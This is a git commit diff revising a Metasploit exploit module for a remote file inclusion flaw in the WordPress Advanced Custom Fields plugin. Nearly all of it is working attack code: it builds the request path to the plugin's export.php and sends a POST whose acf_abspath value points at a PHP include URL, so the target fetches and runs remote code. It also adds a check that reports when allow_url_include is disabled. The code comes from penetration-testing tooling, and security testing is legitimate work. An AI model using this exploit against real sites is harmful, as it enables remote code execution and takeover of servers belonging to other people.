Multiple change for Juan
Incooperated changes as per Juan's suggestions. - Removed redundant space option for the payload - Doing the uri more intelligently - Detecting allow_url_include being disabled and reporting it - Moved to unix/webapp - Removed redundant handler call - Adding to description that this requires allow_url_include to be enabledbug/bundler_fix
Charlie Eriksen
parent
78c6d04b31
commit
97253d46a1
|
|
@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
This module exploits a remote file inclusion flaw in the WordPress
|
This module exploits a remote file inclusion flaw in the WordPress
|
||||||
blogging software plugin known as Advanced Custom Fields. The vulnerability allows for
|
blogging software plugin known as Advanced Custom Fields. The vulnerability allows for
|
||||||
remote file inclusion and remote code execution via the export.php script. The
|
remote file inclusion and remote code execution via the export.php script. The
|
||||||
Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable.
|
Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit
|
||||||
|
only works when the php option allow_url_include is set to On(Default Off).
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
|
@ -40,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'ConnectionType' => 'find',
|
'ConnectionType' => 'find',
|
||||||
},
|
},
|
||||||
'Space' => 262144, # 256k
|
|
||||||
},
|
},
|
||||||
'Platform' => 'php',
|
'Platform' => 'php',
|
||||||
'Arch' => ARCH_PHP,
|
'Arch' => ARCH_PHP,
|
||||||
|
|
@ -58,10 +58,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def check
|
def check
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
uri << '/' if uri[-1,1] != '/'
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
uri << datastore['PLUGINSPATH']
|
||||||
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php"
|
'uri' => "#{uri}advanced-custom-fields/core/api.php"
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200
|
if res and res.code == 200
|
||||||
|
|
@ -72,25 +74,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def php_exploit
|
def php_exploit
|
||||||
|
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
uri << '/' if uri[-1,1] != '/'
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
uri << datastore['PLUGINSPATH']
|
||||||
plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php"
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
|
||||||
print_status('Sending request')
|
print_status('Sending request')
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => "#{uri}#{plugin_path}",
|
'uri' => "#{uri}advanced-custom-fields/core/actions/export.php",
|
||||||
'data' => "acf_abspath=#{php_include_url}"
|
'data' => "acf_abspath=#{php_include_url}"
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code != 200
|
if res and res.body =~ /allow_url_include/
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable, 'allow_url_include is disabled')
|
||||||
|
elsif res.code != 200
|
||||||
fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
|
fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
|
||||||
end
|
end
|
||||||
|
|
||||||
handler
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
Loading…
Reference in New Issue